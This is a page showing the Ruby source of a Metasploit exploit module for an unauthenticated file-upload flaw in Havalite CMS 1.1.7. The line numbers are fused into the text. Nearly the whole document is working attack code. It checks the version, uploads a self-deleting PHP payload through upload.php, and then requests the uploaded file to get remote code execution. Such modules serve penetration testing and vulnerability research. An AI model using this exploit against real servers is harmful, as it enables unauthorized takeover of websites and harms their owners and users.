Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::PhpEXE1011def initialize(info={})12super(update_info(info,13'Name' => "Havalite CMS Arbitary File Upload Vulnerability",14'Description' => %q{15This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and16possibly prior. Attackers can abuse the upload feature in order to upload a17malicious PHP file without authentication, which results in arbitrary remote code18execution.19},20'License' => MSF_LICENSE,21'Author' =>22[23'CWH',24'sinn3r' #Metasploit25],26'References' =>27[28['OSVDB', '94405'],29['EDB', '26243']30],31'Payload' =>32{33'BadChars' => "\x00"34},35'Platform' => %w{ linux php },36'Targets' =>37[38[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],39[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]40],41'Privileged' => false,42'DisclosureDate' => '2013-06-17',43'DefaultTarget' => 0))4445register_options(46[47OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])48])49end5051#52# Checks if target is running HavaLite CMS 1.1.753# We only flag 1.1.7 as vulnerable, because we don't have enough information from54# the vendor or OSVDB about exactly which ones are really vulnerable.55#56def check57uri = normalize_uri(target_uri.path, 'havalite/')58res = send_request_raw({'uri' => uri})5960if not res61vprint_error("Connection timed out")62return Exploit::CheckCode::Unknown63end6465js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''66version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''6768if not version.empty? and version =~ /1\.1\.7/69vprint_status("Version found: #{version}")70return Exploit::CheckCode::Appears71end7273Exploit::CheckCode::Safe74end757677#78# Uploads our malicious file79#80def upload(base)81p = get_write_exec_payload(:unlink_self=>true)82fname = "#{rand_text_alpha(5)}.php"8384data = Rex::MIME::Message.new85data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")86post_data = data.to_s8788res = send_request_cgi({89'method' => 'POST',90'uri' => normalize_uri(base, 'havalite', 'upload.php'),91'ctype' => "multipart/form-data; boundary=#{data.bound}",92'data' => post_data93})9495if not res96fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")97elsif res.code.to_i == 40498fail_with(Failure::NotFound, "#{peer} - No upload.php found")99elsif res.body =~ /"error"\:"abort"/100fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")101end102103return fname104end105106107#108# Executes our uploaded malicious file109#110def exec(base, payload_fname)111res = send_request_raw({112'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)113})114115if res and res.code == 404116fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")117end118end119120121def exploit122base = target_uri.path123124print_status("Uploading malicious file...")125fname = upload(base)126127print_status("Executing #{fname}...")128exec(base, fname)129end130end131132133